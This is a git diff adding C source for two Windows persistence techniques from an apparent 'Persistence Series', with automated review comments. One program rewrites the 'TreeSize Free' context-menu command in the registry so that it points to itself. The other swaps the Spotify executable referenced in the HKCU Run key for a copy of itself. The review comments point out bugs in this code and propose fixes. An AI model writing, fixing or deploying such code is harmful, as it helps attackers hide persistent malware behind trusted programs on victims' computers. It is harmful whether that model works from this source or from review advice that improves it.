diff --git a/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.c b/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.c
new file mode 100644
index 0000000..0ae376a
--- /dev/null
+++ b/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.c
@@ -0,0 +1,200 @@
+#include
+#include
+#include
+
+#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))
+
+DWORD HijackContextMenu(VOID);
+BOOL DoIExist(VOID);
+
+int main(VOID)
+{
+ DWORD dwReturn = ERROR_SUCCESS;
+ dwReturn = HijackContextMenu();
+
+ if (dwReturn != ERROR_SUCCESS && dwReturn != ERROR_FILE_EXISTS)
+ {
+ return dwReturn;
+ }
+
+ if (DoIExist())
+ {
+ MessageBoxA(NULL, "", "", MB_OK);
+ ExitProcess(GetLastError());
+ }
+
+ while (TRUE)
+ {
+ Sleep(1000);
+ }
+
+ return ERROR_SUCCESS;
+}
+
+BOOL DoIExist(VOID)
+{
+ DWORD dwProcesses[1024] = { 0 };
+ WCHAR wPath[WCHAR_MAXPATH] = { 0 };
+ DWORD wPathSize = WCHAR_MAXPATH;
+ DWORD dwNeeded = 0;
+ DWORD dwProcess = 0;
+ DWORD dwCount = 0;
+
+ if (!EnumProcesses(dwProcesses, sizeof(dwProcesses), &dwNeeded))
+ {
+ return FALSE;
+ }
+
+ if (GetModuleFileName(NULL, wPath, wPathSize) == 0)
+ {
+ return FALSE;
+ }
+
+ dwProcess = dwNeeded / sizeof(DWORD);
+ for (DWORD dwIndex = 0; dwIndex < dwProcess; dwIndex++)
+ {
+ WCHAR wModule[WCHAR_MAXPATH] = { 0 };
+ if (dwProcesses[dwIndex] != 0)
+ {
+ DWORD dwId = dwProcesses[dwIndex];
+ HANDLE hHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwId);
+ if (hHandle != NULL)
+ {
+ HMODULE hMod;
+ DWORD dwSize;
+
+ if (EnumProcessModules(hHandle, &hMod, sizeof(hMod), &dwSize))
+ {
+ GetModuleBaseName(hHandle, hMod, wModule, (sizeof(wModule) / sizeof(WCHAR)));
+
+ if (wcsstr(wPath, wModule) != NULL)
+ {
+ dwCount++;
+ if (dwCount > 1)
+ {
+ return TRUE;
+ }
+ }
+
+ }
+ }
+
+ if (hHandle)
+ {
+ CloseHandle(hHandle);
+ }
+ }
+ }
+
+ return FALSE;
+}
+
+
+
+DWORD HijackContextMenu(VOID)
+{
+ HKEY hKey = HKEY_CLASSES_ROOT;
+ WCHAR lpSubKey[WCHAR_MAXPATH] = L"Directory\\Background\\shell";
+ HKEY hOpenKey = NULL;
+ HKEY phkResult;
+ DWORD dwSubKeys;
+
+ if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult) != ERROR_SUCCESS)
+ {
+ return GetLastError();
+ }
+
+ if (RegQueryInfoKey(phkResult, NULL, NULL, NULL, &dwSubKeys, NULL, NULL, NULL, NULL, 
NULL, NULL, NULL) != ERROR_SUCCESS)
+ {
+ goto EXIT_ROUTINE;
+ }
+
+ for (DWORD i = 0; i < dwSubKeys; i++)
+ {
+ DWORD Enum;
+ WCHAR lpName[WCHAR_MAXPATH] = { 0 };
+ WCHAR lpFullName[WCHAR_MAXPATH] = { 0 };
+ DWORD lpcchName = WCHAR_MAXPATH;
+ hOpenKey = 0;
+ WCHAR bValue[WCHAR_MAXPATH] = L"CALC.EXE";
+ WCHAR pvData[2048] = { 0 };
+ WCHAR wModulePath[WCHAR_MAXPATH] = { 0 };
+
+ Enum = RegEnumKeyExW(phkResult, i, lpName, &lpcchName, NULL, NULL, NULL, NULL);
+
+ if (Enum != ERROR_SUCCESS && Enum != ERROR_NO_MORE_ITEMS)
+ {
+ goto EXIT_ROUTINE;
+ }
+
+ if (wcsstr(lpName, L"TreeSize Free") != NULL)
+ {
+ wcscat(lpName, L"\\command");
+ if (RegOpenKeyEx(phkResult, lpName, 0, KEY_ALL_ACCESS, &hOpenKey) != ERROR_SUCCESS)
+ {
+ goto EXIT_ROUTINE;
+ }
+
+ Enum = 2048;
+ if (RegGetValue(hOpenKey, NULL, NULL, RRF_RT_REG_SZ, NULL, pvData, &Enum) != ERROR_SUCCESS)
+ {
+ goto EXIT_ROUTINE;
+ }
+
+ if (GetModuleFileName(NULL, bValue, WCHAR_MAXPATH) == 0)
+ {
+ goto EXIT_ROUTINE;
+ }
+
+ if (wcscmp(bValue, pvData) == ERROR_SUCCESS)
+ {
+ if (phkResult)
+ {
+ RegCloseKey(phkResult);
+ }
+
+ if (hOpenKey)
+ {
+ RegCloseKey(hOpenKey);
+ }
+
+ return ERROR_FILE_EXISTS;
+ }
+
+ if (RegSetValueEx(hOpenKey, NULL, 0, REG_SZ, (PBYTE)bValue, sizeof(bValue)) != ERROR_SUCCESS)
+ {
+ goto EXIT_ROUTINE;
+ }
+
+ if (hOpenKey)
+ {
+ RegCloseKey(hOpenKey);
+ }
+
+ break;
+ }
+
+ }
+
+ if (phkResult)
+ {
+ RegCloseKey(phkResult);
+ }
+
+ return ERROR_SUCCESS;
+
+EXIT_ROUTINE:
+
+ if (phkResult)
+ {
+ RegCloseKey(phkResult);
+ }
+
+ if (hOpenKey)
+ {
+ RegCloseKey(hOpenKey);
+ }
+
+ return GetLastError();
+
+}
\ No newline at end of file
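Review bot: `return GetLastError();` after the failed `RegOpenKeyEx` in `HijackContextMenu`, and again at the `EXIT_ROUTINE` label, reports a stale or zero value, because the `Reg*` functions return their `LSTATUS` directly and are not documented to set the thread's last-error; `main` may therefore receive `ERROR_SUCCESS` for a call that failed and continue as if it had succeeded. Keep the status in a local and return it: `LSTATUS status = RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult); if (status != ERROR_SUCCESS) return status;`, and have each `goto EXIT_ROUTINE` site store its status in the same variable so the label returns it instead of `GetLastError()`. A point of style: `wcscmp(bValue, pvData) == ERROR_SUCCESS` compares a string-comparison result with a Win32 error constant and should read `== 0`, and `lpFullName` and `wModulePath` are declared in the loop body but never used. The same `GetLastError()`-after-`Reg*` pattern appears in the second file's `FAILURE` label.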
diff --git a/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.pdf b/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.pdf
new file mode 100644
index 0000000..6139671
Binary files /dev/null and b/The Persistence Series/Commandeering Context Menu Entries/CommandeeringContextMenuEntries.pdf differ
diff --git a/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.c b/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.c
new file mode 100644
index 0000000..4a8d910
--- /dev/null
+++ b/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.c
@@ -0,0 +1,115 @@
+#include
+#include
+
+#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))
+
+
+DWORD MasqueradeSpotifyKey(VOID);
+
+
+int main(VOID)
+{
+ DWORD dwError = ERROR_SUCCESS;
+ WCHAR wModulePath[WCHAR_MAXPATH] = { 0 };
+
+ if (GetModuleFileNameW(NULL, wModulePath, WCHAR_MAXPATH) == 0)
+ goto FAILURE;
+
+ if (wcsstr(wModulePath, L"Spotify") == NULL)
+ {
+ if (MasqueradeSpotifyKey() != ERROR_SUCCESS)
+ goto FAILURE;
+ }
+ else
+ MessageBoxA(NULL, "", "", MB_OK);
+
+ return ERROR_SUCCESS;
+
+FAILURE:
+
+ dwError = GetLastError();
+
+ return dwError;
+}
+
+DWORD MasqueradeSpotifyKey(VOID)
+{
+ DWORD dwError = ERROR_SUCCESS;
+ WCHAR wModulePath[WCHAR_MAXPATH] = { 0 }, wNewPath[WCHAR_MAXPATH] = { 0 };
+ WCHAR wRegistryPath[WCHAR_MAXPATH] = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run";
+ HKEY hKey = NULL, hHive = HKEY_CURRENT_USER;
+ BOOL bFlag = FALSE;
+
+ dwError = (LRESULT)RegOpenKeyExW(hHive, wRegistryPath, 0, KEY_ALL_ACCESS, &hKey);
+ if (dwError != ERROR_SUCCESS)
+ goto FAILURE;
+
+ for (; dwError < 256; dwError++)
+ {
+ DWORD dwReturn = 0, lpType = 0, dwValueSize = WCHAR_MAXPATH, dwDataSize = WCHAR_MAXPATH;
+ BYTE lpData[WCHAR_MAXPATH] = { 0 };
+ WCHAR wString[WCHAR_MAXPATH] = { 0 };
+ WCHAR lpValue[WCHAR_MAXPATH] = { 0 };
+
+ dwReturn = (LSTATUS)RegEnumValueW(hKey, dwError, lpValue, &dwValueSize, NULL, &lpType, lpData, &dwDataSize);
+ if (dwReturn != ERROR_SUCCESS && dwError != ERROR_NO_MORE_ITEMS)
+ goto FAILURE;
+
+ if (lpType != REG_SZ)
+ continue;
+
+ swprintf(wString, L"%ws", lpData);
+
+ if (wcsstr(wString, L"Spotify") != NULL)
+ {
+ bFlag = TRUE;
+ break;
+ }
+ }
+
+ if (!bFlag)
+ {
+ SetLastError(ERROR_FILE_NOT_FOUND);
+ goto FAILURE;
+ }
+
+ if (GetEnvironmentVariableW(L"APPDATA", wModulePath, WCHAR_MAXPATH) == 0)
+ goto FAILURE;
+
+ wcscat(wModulePath, L"\\Spotify\\Spotify.exe");
+
+ if (GetEnvironmentVariableW(L"APPDATA", wNewPath, WCHAR_MAXPATH) == 0)
+ goto FAILURE;
+
+ wcscat(wNewPath, L"\\Spotify\\RealSpotify.exe");
+
+ if 
(!MoveFile(wModulePath, wNewPath))
+ goto FAILURE;
+
+ ZeroMemory(wModulePath, WCHAR_MAXPATH); ZeroMemory(wNewPath, WCHAR_MAXPATH);
+
+ if (GetModuleFileNameW(NULL, wModulePath, WCHAR_MAXPATH) == 0)
+ goto FAILURE;
+
+ if (GetEnvironmentVariableW(L"APPDATA", wNewPath, WCHAR_MAXPATH) == 0)
+ goto FAILURE;
+
+ wcscat(wNewPath, L"\\Spotify\\Spotify.exe");
+
+ if (!CopyFile(wModulePath, wNewPath, TRUE))
+ goto FAILURE;
+
+ if (hKey)
+ RegCloseKey(hKey);
+
+ return ERROR_SUCCESS;
+
+FAILURE:
+
+ dwError = GetLastError();
+
+ if (hKey)
+ RegCloseKey(hKey);
+
+ return dwError;
+}
\ No newline at end of file
diff --git a/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.pdf b/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.pdf
new file mode 100644
index 0000000..ee87630
Binary files /dev/null and b/The Persistence Series/Masquerading the HKCU Run Key/MasqueradingtheHKCURunKey.pdf differ
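Review bot: The enumeration loop in `MasqueradeSpotifyKey` tests the wrong variable: `if (dwReturn != ERROR_SUCCESS && dwError != ERROR_NO_MORE_ITEMS)` compares the loop index `dwError` (always below 256) with `ERROR_NO_MORE_ITEMS`, so the ordinary end of enumeration returned in `dwReturn` jumps to `FAILURE` instead of falling through to the `!bFlag` check that sets `ERROR_FILE_NOT_FOUND`; at `FAILURE` the code then reads `GetLastError()`, which `RegEnumValueW` is not documented to set, so the function may report `ERROR_SUCCESS` without having found anything. Test the return value instead: `if (dwReturn == ERROR_NO_MORE_ITEMS) break;` followed by `if (dwReturn != ERROR_SUCCESS) goto FAILURE;`. Reusing `dwError` as the loop index also discards the `RegOpenKeyExW` status it held and reads poorly; a separate `DWORD i` index would make the intent clear. Separately, `lpData` returned by `RegEnumValueW` is not guaranteed to be NUL-terminated, so `swprintf(wString, L"%ws", lpData)` can read past the data that was actually written; bounding the copy by `dwDataSize` would make the read well-defined.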